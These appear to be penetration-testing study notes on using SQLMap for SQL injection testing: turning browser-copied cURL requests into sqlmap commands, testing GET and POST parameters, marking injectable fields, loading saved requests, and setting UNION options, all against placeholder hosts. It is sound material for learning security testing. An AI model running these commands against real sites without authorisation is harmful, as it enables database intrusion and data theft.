Skip to content

SQLMap on HTTP Request

  • SQLMap commands need to be set properly

cURL commands

  • Copy as cURL feature from within the Network (Monitor) panel inside the Chrome, Edge, or Firefox Developer Tools
  • paste it into the command line and swap curl with sqlmap
  • sqlmap 'http://www.example.com/?id=1' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0' -H 'Accept: image/webp,*/*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'DNT: 1'
  • when providing data to sqlmap:
    • the command must have an injection parameter via GET or POST
    • or automatic parameter finding switches like (--crawl, --forms, -g)

GET/POST Requests

  • GET requests are with -u URL.com?id=1
  • POST requests are:
    • sqlmap 'http://URL.com' --data 'uid=1&name=test'
  • for POST, both the uid and name parameters will be tested.
  • if we know that uid is injectable:
    • we can use -p uid
    • OR, --data 'uid=1*&name=test'

Full HTTP Request

  • save a request to a file (req.txt)
  • sqlmap -r req.txt
  • if we want to focus on a parameter, we can use the * just like above.

UNION

  • --union-cols=17
    • when we know the number of columns
  • --union-char='a'
    • when we dont want to fill the values with NULL
  • --union-from=users
    • when we want to do UNION from TABLE